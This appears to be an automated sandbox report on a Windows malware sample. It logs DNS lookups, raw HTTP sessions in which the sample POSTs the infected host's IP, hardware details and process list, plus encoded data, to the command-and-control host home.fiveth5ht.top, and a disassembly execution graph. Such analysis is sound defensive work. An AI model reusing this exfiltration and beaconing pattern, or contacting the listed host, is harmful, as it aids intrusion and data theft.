                                Dec 27, 2024 08:38:21.299475908 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.418920040 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:21.419015884 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.419481039 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.538942099 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:22.896377087 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:22.896532059 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:22.896600962 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:22.896904945 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:23.017709970 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:23.107873917 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:23.227502108 CET80497215.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:23.227576017 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:23.228013039 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:23.347445965 CET80497215.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:24.734215975 CET80497215.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:24.734316111 CET80497215.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:24.734390020 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:24.734678984 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:24.854290962 CET80497215.101.3.217192.168.2.7

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 27, 2024 08:38:10.292380095 CET5916253192.168.2.71.1.1.1
                                Dec 27, 2024 08:38:10.292491913 CET5916253192.168.2.71.1.1.1
                                Dec 27, 2024 08:38:10.429814100 CET53591621.1.1.1192.168.2.7
                                Dec 27, 2024 08:38:10.430349112 CET53591621.1.1.1192.168.2.7
                                Dec 27, 2024 08:38:15.503846884 CET5368853192.168.2.71.1.1.1
                                Dec 27, 2024 08:38:15.503946066 CET5368853192.168.2.71.1.1.1
                                Dec 27, 2024 08:38:16.353640079 CET53536881.1.1.1192.168.2.7
                                Dec 27, 2024 08:38:16.353653908 CET53536881.1.1.1192.168.2.7
                                Dec 27, 2024 08:38:21.160672903 CET5369053192.168.2.71.1.1.1
                                Dec 27, 2024 08:38:21.160757065 CET5369053192.168.2.71.1.1.1
                                Dec 27, 2024 08:38:21.298346996 CET53536901.1.1.1192.168.2.7
                                Dec 27, 2024 08:38:21.298464060 CET53536901.1.1.1192.168.2.7
                                Dec 27, 2024 08:38:22.968153954 CET5845353192.168.2.71.1.1.1
                                Dec 27, 2024 08:38:22.968244076 CET5845353192.168.2.71.1.1.1
                                Dec 27, 2024 08:38:23.106138945 CET53584531.1.1.1192.168.2.7
                                Dec 27, 2024 08:38:23.106152058 CET53584531.1.1.1192.168.2.7

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 27, 2024 08:38:10.292380095 CET192.168.2.71.1.1.10x4056Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                Dec 27, 2024 08:38:10.292491913 CET192.168.2.71.1.1.10x66aeStandard query (0)httpbin.org28IN (0x0001)false
                                Dec 27, 2024 08:38:15.503846884 CET192.168.2.71.1.1.10x9e53Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                Dec 27, 2024 08:38:15.503946066 CET192.168.2.71.1.1.10xbadfStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                Dec 27, 2024 08:38:21.160672903 CET192.168.2.71.1.1.10x3529Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                Dec 27, 2024 08:38:21.160757065 CET192.168.2.71.1.1.10x266cStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                Dec 27, 2024 08:38:22.968153954 CET192.168.2.71.1.1.10x3088Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                Dec 27, 2024 08:38:22.968244076 CET192.168.2.71.1.1.10xc7d7Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 27, 2024 08:38:10.430349112 CET1.1.1.1192.168.2.70x4056No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                Dec 27, 2024 08:38:10.430349112 CET1.1.1.1192.168.2.70x4056No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                Dec 27, 2024 08:38:16.353653908 CET1.1.1.1192.168.2.70x9e53No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                Dec 27, 2024 08:38:21.298346996 CET1.1.1.1192.168.2.70x3529No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                Dec 27, 2024 08:38:23.106152058 CET1.1.1.1192.168.2.70x3088No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • httpbin.org
                                • home.fiveth5ht.top

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.7497025.101.3.217801008C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                TimestampBytes transferredDirectionData
                                Dec 27, 2024 08:38:16.491507053 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 561951
                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 33 39 38 35 38 39 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652913985891", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                Dec 27, 2024 08:38:16.611265898 CET4944OUTData Raw: 4b 4d 42 77 74 66 71 4f 45 78 6d 45 78 39 43 6e 69 73 44 69 73 50 6a 4d 4e 56 56 36 57 4a 77 6c 61 6e 69 4b 46 52 62 58 70 31 71 4d 70 30 35 71 2b 6c 34 79 5a 2b 54 59 33 41 34 33 4c 63 54 55 77 65 59 34 50 46 59 44 47 55 58 79 31 73 4c 6a 63 50
                                Data Ascii: KMBwtfqOExmEx9CnisDisPjMNVV6WJwlaniKFRbXp1qMp05q+l4yZ+TY3A43LcTUweY4PFYDGUXy1sLjcPWwuJpNq9qlCvCnVg7a2lFOw1\/un8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9Y9N\/4JS\/EPVNP0bUrX4g2tza63pmmanbTWXg2+u4Ik1O0iuoobiVddQW8qeaIGM6w
                                Dec 27, 2024 08:38:16.611382961 CET4944OUTData Raw: 2f 39 4d 5c 2f 38 41 58 2b 64 37 5c 2f 77 44 36 5c 2f 77 44 43 6d 62 58 77 47 52 34 30 68 38 33 5c 2f 41 46 58 45 38 5c 2f 38 41 6b 5c 2f 6e 5c 2f 41 43 70 5c 2f 54 5a 38 5c 2f 6c 79 78 34 5c 2f 64 5c 2f 38 39 76 78 5c 2f 54 72 2b 6e 46 44 65 59
                                Data Ascii: /9M\/8AX+d7\/wD6\/wDCmbXwGR40h83\/AFXE8\/8Ak\/n\/ACp\/TZ8\/lyx4\/d\/89vx\/Tr+nFDeYI0d\/ueV\/yzi\/1P8AnoKDoK0myTfsOxPL82LP7\/8Aznv71N96Rkd408w8R\/6\/tz\/k8iiI7o3m2bE\/13J\/5ePp\/X+dG15Mb0+frn\/21\/n\/AEoNKfX5ELbPk2eZs83yvs\/\/AC3wf8+vPfNH+r2Jv\
                                Dec 27, 2024 08:38:16.611540079 CET4944OUTData Raw: 62 65 47 66 43 65 72 65 44 66 44 33 68 74 64 63 38 54 2b 4c 4e 44 5c 2f 77 43 45 61 30 62 53 64 63 38 63 5c 2f 45 54 56 6d 30 2b 77 50 68 6b 33 4e 74 63 58 33 69 61 35 6d 45 56 38 74 6d 49 31 53 7a 53 57 62 39 66 62 6a 39 74 62 77 68 44 34 44 2b
                                Data Ascii: beGfCereDfD3htdc8T+LND\/wCEa0bSdc8c\/ETVm0+wPhk3NtcX3ia5mEV8tmI1SzSWb9fbj9tbwhD4D+D+uP8A8FR\/Ki8XeBNZ1218Wf8ADEupyf8ACxobP4s\/E7wq3iv+wR4VLeEP7MufDVx8Pv7CkitnvP8AhBv+EsELR+JkuJ\/iv\/gtyCf2q\/h9gf8ANvnhX\/1Y\/wAV6\/rX6IGbYmHj1wfhsFisRh8PmGG4iwu
                                Dec 27, 2024 08:38:16.611560106 CET2472OUTData Raw: 5c 2f 50 76 6e 6d 69 56 58 58 35 33 53 4f 48 7a 50 2b 65 6e 37 38 5c 2f 35 5c 2f 7a 37 30 5c 2f 63 38 55 65 5c 2f 77 41 37 5a 35 63 76 6c 64 5c 2f 50 6d 37 56 6f 62 45 50 50 37 6c 49 30 6b 66 66 36 38 66 70 5c 2f 39 65 71 32 37 79 7a 5c 2f 41 4d
                                Data Ascii: \/PvnmiVXX53SOHzP+en78\/5\/z70\/c8Ue\/wA7Z5cvld\/Pm7VobEPP7lI0kff68fp\/9eq27yz\/AM9vL5\/6Yd\/z\/L9cVN8nluu\/182PyvJ\/L\/P4UfO2+Hp+9\/55df1+nSp9\/wDu\/iBC399fL\/56+XJN\/qv+nX\/Pr6UeX+7mT94iTxfu8fl\/+v8A\/XU23zFL7N8Mn+q9P\/AT36evpVXcm3+DZH+98v8A
                                Dec 27, 2024 08:38:16.611640930 CET7416OUTData Raw: 79 4c 4d 73 54 51 71 52 77 57 59 55 63 52 68 71 4f 46 78 64 66 43 34 47 6e 68 63 56 7a 79 72 79 2b 71 56 61 55 70 55 4e 4b 4d 6a 5c 2f 54 33 36 48 5c 2f 41 4e 66 78 50 38 4e 33 6a 73 6f 7a 57 4f 52 38 55 63 47 5a 74 78 64 6b 47 42 7a 57 46 66 42
                                Data Ascii: yLMsTQqRwWYUcRhqOFxdfC4GnhcVzyry+qVaUpUNKMj\/T36H\/ANfxP8N3jsozWOR8UcGZtxdkGBzWFfBVKmFwfEOWYHGUqmMy2vQxVfFYSjjMwrYjCONPDweKo4inHEJutE\/NT9in4mfE34jeC\/jCPEuj6Rp3w50C9Ww+HA0fRdI8P2emLMmrX2r+HY7HSLGzguGsba50W7uZ2GYLm+dVaRLhVg6Kv0p8S6PpSeG9bji0+0
                                Dec 27, 2024 08:38:16.731128931 CET4944OUTData Raw: 35 5a 2b 56 5c 2f 35 4b 39 66 38 5c 2f 6a 52 4a 44 43 79 78 76 73 7a 31 5c 2f 77 41 5c 2f 35 5c 2f 58 75 65 58 49 73 61 62 30 6b 6d 54 5c 2f 57 2b 2b 66 58 72 36 66 35 50 66 50 32 66 6e 2b 48 5c 2f 42 4c 35 33 35 66 31 38 79 47 52 6e 59 75 37 76
                                Data Ascii: 5Z+V\/5K9f8\/jRJDCyxvsz1\/wA\/5\/XueXIsab0kmT\/W++fXr6f5PfP2fn+H\/BL535f18yGRnYu7vsH+r\/1Vtn\/P6f1Zt3b3dPJeT\/P0745\/pT0jG1\/3MezH8f04tf8Ar+70yTPmP\/7T\/cQen19+tZmoyPZ5h353\/wCql\/8Akr8P6UwSFvnR8v8A88\/+nfHpnr0p+5PnR3+SX7P\/AMtf\/Jr+nWofnXfsTy
                                Dec 27, 2024 08:38:16.731185913 CET2472OUTData Raw: 2f 68 38 32 7a 54 4c 63 32 7a 62 4f 73 69 77 74 62 43 5a 4e 50 46 55 38 66 50 47 35 52 6a 38 54 5c 2f 5a 2b 45 71 77 6a 68 59 59 61 72 53 69 36 4b 6b 2b 46 52 42 47 6f 56 64 32 42 5c 2f 65 5a 6e 50 34 73 78 4a 50 35 30 36 6b 31 43 36 30 4b 48 53
                                Data Ascii: /h82zTLc2zbOsiwtbCZNPFU8fPG5Rj8T\/Z+EqwjhYYarSi6Kk+FRBGoVd2B\/eZnP4sxJP506k1C60KHSfh\/wCLfDHxA+HfxT+HXxTPiyz8CfEn4X6x4ovfDeq+IvAV5plp428Hanonj\/wZ8OPiR4R8V+G017w5qVzpfjHwFoA1TRPEmh694cuNa0TUI9QC1\/TWQcRZJxPl0M0yDMKGZYCVWth\/bUVUg6eIw1SVHEYetRr
                                Dec 27, 2024 08:38:16.731389046 CET4944OUTData Raw: 45 4b 64 58 32 4c 70 31 5a 52 55 4b 31 47 55 34 4b 69 66 72 2b 48 39 54 55 64 37 64 52 32 4e 6e 64 33 73 33 2b 71 73 37 61 65 36 6c 37 66 75 37 65 4a 35 58 35 50 54 35 55 50 4e 57 49 62 57 37 75 5c 2f 69 6e 38 4c 66 67 5c 2f 48 66 2b 46 6a 34 73
                                Data Ascii: EKdX2Lp1ZRUK1GU4Kifr+H9TUd7dR2Nnd3s3+qs7ae6l7fu7eJ5X5PT5UPNWIbW7u\/in8Lfg\/Hf+Fj4s+L1h+z7qXhWddZ1M6HaW\/7Sul+FtX+HieIrw+HVv7Ce3tPF2lf8JEmm6VrSWcgul0uXWUSGS49rOeKOH+HqmGpZ3muEy2pjKWOr4WGJlKMq9LLcLPG46dNRjLm+rYWnUr1F8Xs4ScVKzPnsj4R4k4koY\/FZFk+L
                                Dec 27, 2024 08:38:16.731461048 CET2472OUTData Raw: 5c 2f 36 6a 5c 2f 49 5c 2f 4f 6d 62 66 6d 66 2b 4e 50 38 5c 2f 6e 2b 66 66 33 35 44 70 68 74 38 5c 2f 30 52 54 2b 64 64 69 50 36 63 5c 2f 77 43 50 61 6f 56 5c 2f 6a 7a 6e 7a 50 2b 6d 6e 2b 66 58 50 5c 2f 77 43 71 72 6d 7a 37 5c 2f 56 33 5c 2f 41
                                Data Ascii: \/6j\/I\/Ombfmf+NP8\/n+ff35Dpht8\/0RT+ddiP6c\/wCPaoV\/jznzP+mn+fXP\/wCqrmz7\/V3\/AM\/l+XIqFYk3ImzZ\/wA9cZx\/P\/P0oOqnU\/rv5r+v+BF5f\/fefN\/Tp0\/p7VBJ+8VE++5x5v1\/P0q1\/Gfk39PX0\/zz\/SoPkLIP9d5f\/bAf8ev5fz\/Sg6SsN8f\/ACx3nn\/P+cfzzDtf5N6fJ\/n3\
                                Dec 27, 2024 08:38:16.773658037 CET27192OUTData Raw: 39 50 31 50 35 38 55 41 52 78 37 31 32 5a 54 5a 35 6e 37 72 39 35 5c 2f 68 5c 2f 68 2b 74 51 73 79 52 53 66 38 74 50 2b 65 58 66 79 50 73 5c 2f 39 63 5c 2f 7a 71 79 30 6e 38 61 47 4e 33 6b 7a 2b 37 6b 5c 2f 7a 36 66 35 37 46 6b 63 62 78 78 75 50
                                Data Ascii: 9P1P58UARx712ZTZ5n7r95\/h\/h+tQsyRSf8tP+eXfyPs\/9c\/zqy0n8aGN3kz+7k\/z6f57FkcbxxuPv95eKDoIflTZv8vZ\/zz\/l\/wDXpf3nlumz\/ll+9k83\/wAlf8\/WkjX7mxdjmXPlycf5NC\/MuzfH\/wBMvM6\/qP8AjxrT2nl+P\/AA\/X749aZeaz8H\/H2mWEfnXl5obxQRjPzuLm2fHyhj91T0Brzz44\/
                                Dec 27, 2024 08:38:21.098387003 CET157INHTTP/1.1 200 OK
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:38:20 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 1
                                Connection: close
                                Data Raw: 30
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.7497135.101.3.217801008C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                TimestampBytes transferredDirectionData
                                Dec 27, 2024 08:38:21.419481039 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Dec 27, 2024 08:38:22.896377087 CET372INHTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:38:22 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.7497215.101.3.217801008C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                TimestampBytes transferredDirectionData
                                Dec 27, 2024 08:38:23.228013039 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                Dec 27, 2024 08:38:24.734215975 CET372INHTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:38:24 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.7497003.218.7.1034431008C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                TimestampBytes transferredDirectionData
                                2024-12-27 07:38:12 UTC52OUTGET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
                                2024-12-27 07:38:12 UTC224INHTTP/1.1 200 OK
                                Date: Fri, 27 Dec 2024 07:38:12 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                2024-12-27 07:38:12 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:3
                                Start time:02:38:05
                                Start date:27/12/2024
                                Path:C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\w6cYYyWXqJ.exe"
                                Imagebase:0xe80000
                                File size:4'519'424 bytes
                                MD5 hash:26E7C91D9FB68EF0CE54AABC0465A8B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:17.1%
                                  Total number of Nodes:538
                                  Total number of Limit Nodes:95
                                  execution_graph 64095 1307830 64097 130785a 64095->64097 64096 1307866 64097->64096 64107 12112c0 64097->64107 64099 13078a6 64100 130789a 64100->64099 64101 1307950 64100->64101 64103 1307906 64100->64103 64111 120b500 localeconv localeconv 64101->64111 64104 1307944 64103->64104 64112 120b500 localeconv localeconv 64103->64112 64105 1307979 64108 12112cc 64107->64108 64113 120e050 64108->64113 64110 12112fa 64110->64100 64111->64105 64112->64105 64114 120e09d localeconv localeconv 64113->64114 64127 120e503 64113->64127 64116 120e0ce 64114->64116 64115 120e388 64119 120e1a6 64115->64119 64126 12100b8 ungetc 64115->64126 64115->64127 64116->64115 64117 120e243 64116->64117 64118 120e18e 64116->64118 64116->64119 64116->64127 64117->64119 64122 1210742 ungetc 64117->64122 64118->64119 64120 120ed90 ungetc 64118->64120 64119->64110 64120->64119 64121 1210250 ungetc 64121->64127 64122->64119 64123 12111a4 ungetc 64123->64127 64124 12108d7 ungetc 64124->64127 64125 1210e3e ungetc 64125->64127 64126->64115 64127->64117 64127->64119 64127->64121 64127->64123 64127->64124 64127->64125 64128 1210006 ungetc 64127->64128 64128->64127 64312 130f250 64320 1211360 64312->64320 64314 130f28e 64315 130f282 64315->64314 64316 1211360 2 API calls 64315->64316 64317 130f2d3 64316->64317 64319 130f2ec 64317->64319 64327 1211420 localeconv localeconv 64317->64327 64321 12113b0 64320->64321 64322 1211379 64320->64322 64324 120d1d0 2 API calls 64321->64324 64328 120d1d0 64322->64328 64326 12113d0 64324->64326 64325 1211398 64325->64315 64326->64315 64327->64319 64333 120d1ed 64328->64333 64329 120d504 localeconv 64329->64333 64330 120ca50 localeconv 64330->64333 64331 120c9c0 localeconv 64331->64333 64332 120d3ae 64332->64325 64333->64329 64333->64330 64333->64331 64333->64332 64334 120cc90 localeconv 64333->64334 64334->64333 64335 e813c9 64338 e81160 64335->64338 64337 e813a1 64338->64337 64339 1208a20 12 API calls 64338->64339 64339->64338 64340 f35a50 64341 f35a58 64340->64341 64349 f35ea0 64340->64349 64342 f35b50 64341->64342 64353 f35b88 64341->64353 64354 f35a99 64341->64354 64346 f35eb4 64342->64346 64347 f35b7a 64342->64347 64342->64353 64343 f35e96 64379 f49480 closesocket 64343->64379 64344 f35cae 64344->64343 64356 f35da1 __WSAFDIsSet 64344->64356 64362 f4a920 64344->64362 64377 f36d50 localeconv localeconv 64344->64377 64378 f49320 closesocket 64344->64378 64380 f36f10 7 API calls 64346->64380 64366 f370a0 64347->64366 64352 f35ec2 64352->64352 64353->64344 64376 f36d50 localeconv localeconv 64353->64376 64354->64353 64355 f35be2 __WSAFDIsSet 64354->64355 64359 f370a0 8 API calls 64354->64359 64375 f36f10 7 API calls 64354->64375 64355->64354 64356->64344 64359->64354 64363 f4a944 64362->64363 64364 f4a977 send 64363->64364 64365 f4a94b 64363->64365 64364->64344 64365->64344 64367 f370ae 64366->64367 64369 f3717f 64367->64369 64373 f371a7 64367->64373 64381 f4a8c0 64367->64381 64385 f371c0 6 API calls 64367->64385 64369->64373 64386 f36d50 localeconv localeconv 64369->64386 64371 f3719f 64387 f49320 closesocket 64371->64387 64373->64353 64375->64354 64376->64353 64377->64344 64378->64344 64379->64349 64380->64352 64382 f4a8e6 64381->64382 64383 f4a903 recvfrom 64381->64383 64382->64383 64384 f4a8ed 64382->64384 64383->64384 64384->64367 64385->64367 64386->64371 64387->64373 64129 e9d5e0 64130 e9d5f0 64129->64130 64131 e9d652 WSAStartup 64129->64131 64134 e9d67c 64130->64134 64136 e9d690 localeconv localeconv 64130->64136 64131->64130 64133 e9d664 64131->64133 64135 e9d5fa 64136->64135 64388 ebb3c0 64389 ebb3cb 64388->64389 64390 ebb3ee 64388->64390 64394 e876a0 64389->64394 64405 eb9290 64389->64405 64391 ebb3ea 64395 e876c0 64394->64395 64396 e876e6 send 64394->64396 64395->64396 64397 e876c9 64395->64397 64398 e876d3 64396->64398 64404 e87704 64396->64404 64397->64398 64399 e8770b 64397->64399 64419 e872a0 localeconv localeconv 64398->64419 64420 e872a0 localeconv localeconv 64399->64420 64402 e8771c 64421 e8cb20 localeconv localeconv 64402->64421 64404->64391 64406 e876a0 3 API calls 64405->64406 64407 eb92e5 64406->64407 64408 eb92f3 64407->64408 64409 eb93c3 64407->64409 64413 eb9392 64408->64413 64414 eb9335 WSAIoctl 64408->64414 64409->64413 64422 e9d090 localeconv localeconv 64409->64422 64411 eb93be 64411->64391 64412 eb93f7 64423 ec4f40 localeconv localeconv 64412->64423 64413->64411 64424 ec50a0 localeconv localeconv 64413->64424 64414->64413 64417 eb9366 64414->64417 64417->64413 64418 eb9371 setsockopt 64417->64418 64418->64413 64419->64404 64420->64402 64421->64404 64422->64412 64423->64413 64424->64411 64425 ebe400 64426 ebe412 64425->64426 64428 ebe459 64425->64428 64427 ebe422 64426->64427 64449 ed3030 localeconv localeconv 64426->64449 64450 ee09d0 localeconv localeconv 64427->64450 64432 ebe4a8 64428->64432 64436 ebe495 64428->64436 64437 ebb5a0 64428->64437 64433 ebe42b 64451 eb68b0 closesocket localeconv localeconv 64433->64451 64435 ebb5a0 2 API calls 64435->64432 64436->64432 64436->64435 64438 ebb5c0 64437->64438 64448 ebb5d2 64437->64448 64439 ebb713 64438->64439 64441 ebb626 64438->64441 64438->64448 64453 ec4f40 localeconv localeconv 64439->64453 64442 ebb65a 64441->64442 64443 ebb72b 64441->64443 64445 ebb737 64441->64445 64441->64448 64452 ec50a0 localeconv localeconv 64441->64452 64442->64443 64442->64445 64442->64448 64443->64448 64454 ec50a0 localeconv localeconv 64443->64454 64445->64448 64455 ec50a0 localeconv localeconv 64445->64455 64448->64436 64449->64427 64450->64433 64451->64428 64452->64441 64453->64448 64454->64448 64455->64448 64456 ebb400 64457 ebb40b 64456->64457 64458 ebb425 64456->64458 64461 e87770 64457->64461 64459 ebb421 64462 e87790 64461->64462 64463 e877b6 recv 64461->64463 64462->64463 64465 e87799 64462->64465 64464 e877a3 64463->64464 64471 e877d4 64463->64471 64472 e872a0 localeconv localeconv 64464->64472 64465->64464 64466 e877db 64465->64466 64473 e872a0 localeconv localeconv 64466->64473 64469 e877ec 64474 e8cb20 localeconv localeconv 64469->64474 64471->64459 64472->64471 64473->64469 64474->64471 64475 ebf100 64477 ebf11f 64475->64477 64502 ebf1b8 64475->64502 